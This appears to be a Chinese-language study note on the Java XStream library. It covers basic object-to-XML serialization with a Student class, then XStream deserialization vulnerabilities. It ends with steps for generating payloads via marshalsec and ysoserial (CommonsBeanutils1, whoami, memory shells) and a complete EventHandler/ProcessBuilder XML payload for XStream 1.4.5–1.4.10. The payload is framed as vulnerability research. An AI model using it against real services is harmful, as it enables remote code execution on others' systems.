参考:
https://www.bbsmax.com/A/kmzLWkWBdG/ 基本使用
https://blog.csdn.net/wenrennaoda/article/details/105564606 各版本漏洞触发原理
https://zhuanlan.zhihu.com/p/375239304
基本使用
xstream主要作用:类与XML互相转换
引入依赖
<dependencies><dependency><groupId>com.thoughtworks.xstream</groupId><artifactId>xstream</artifactId><version>1.4.10</version></dependency></dependencies>创建Student类
import java.io.Serializable;public class Student implements Serializable {private int id;private String name;private String school;public Student() {// TODO Auto-generated constructor stub}public Student(int id, String name, String school) {super();this.id = id;this.name = name;this.school = school;}public int getId() {return id;}public void setId(int id) {this.id = id;}public String getName() {return name;}public void setName(String name) {this.name = name;}public String getSchool() {return school;}public void setSchool(String school) {this.school = school;}@Overridepublic String toString() {return "Student [id=" + id + ", name=" + name + ", school=" + school + "]";}}
测试SerializeXml类:数组类与XML互转
package com.ser.test;import com.thoughtworks.xstream.XStream;import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;public class SerializeXml {public static void main(String[] args) {serializeToXml();System.out.println("**************************************");deserialize();}public static void serializeToXml() {FileOutputStream write = null;Student stu1 = new Student(10003, "claire", "hh");Student stu2 = new Student(10004, "leafly", "niubi");Student[] students = {stu1,stu2};XStream xstream = new XStream();try {
//将文流怼到文件上write = new FileOutputStream("myObjtoXml.txt");
//将学生对象序列化成Xml并通过流写入到文件中xstream.toXML(students, write);} catch (FileNotFoundException e) {e.printStackTrace();}//将序列化结果输出System.out.println(xstream.toXML(students));}public static void deserialize() {FileInputStream reader;XStream xstream = new XStream();Student[] students=null;try {reader = new FileInputStream ("myObjtoXml.txt");//将Xml文件反序列化为Student对象students=(Student[])xstream.fromXML(reader);if (students != null) {for (Student student : students) {System.out.println(student);}}} catch (FileNotFoundException e) {e.printStackTrace();}}
}
运行后生成XML文件
<com.ser.test.Student-array><com.ser.test.Student><id>10003</id><name>claire</name><school>hh</school></com.ser.test.Student><com.ser.test.Student><id>10004</id><name>leafly</name><school>niubi</school></com.ser.test.Student>
</com.ser.test.Student-array>
测试SerializeXml类:单个类与XML互转
package com.ser.test;import com.thoughtworks.xstream.XStream;import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;public class SerializeXml {public static void main(String[] args) {serializeToXml();System.out.println("**************************************");deserialize();}public static void serializeToXml() {FileOutputStream write = null;Student stu1 = new Student(10003, "claire", "hh");
;XStream xstream = new XStream();try {
//将文流怼到文件上write = new FileOutputStream("myObjtoXml.txt");
//将学生对象序列化成Xml并通过流写入到文件中xstream.toXML(stu1, write);} catch (FileNotFoundException e) {e.printStackTrace();}//将序列化结果输出System.out.println(xstream.toXML(stu1));}public static void deserialize() {FileInputStream reader;XStream xstream = new XStream();try {reader = new FileInputStream ("myObjtoXml.txt");Student stu1=(Student)xstream.fromXML(reader);System.out.println(stu1);} catch (FileNotFoundException e) {e.printStackTrace();}}
}
生成XML如下:
<com.ser.test.Student><id>10003</id><name>claire</name><school>hh</school>
</com.ser.test.Student>
探测URLDNSLOG
POC生成
IDEA导入marshalsec项目,将ysoserial引入依赖
找到想修改的gadgets,这里以CommonsBeanutils为例子
注释掉原有的生object的逻辑,替换成调用ys的逻辑
直接保存,注释掉源代码中serializeToXml,直接反序列化,尝试解析
生成依赖于CommonsBeanutils1直接执行命令的exp
如下 ,因为这里不需要借助ldap远程加载,所以顺者ys的exp生成逻辑写一遍代码,如目标的gadgets的CommonsBeanutils1,执行whoami等,如果需要注入内存马,则替换对ys的模块
其他EXP
基于EventHandler,版本要求:1.4.10 1.4.6 1.4.5
<sorted-set>
<string>foo</string>
<dynamic-proxy><interface>java.lang.Comparable</interface><handler class="java.beans.EventHandler"><target class="java.lang.ProcessBuilder"><command><string>open</string><string>/System/Applications/Calculator.app</string></command></target><action>start</action></handler>
</dynamic-proxy>
</sorted-set>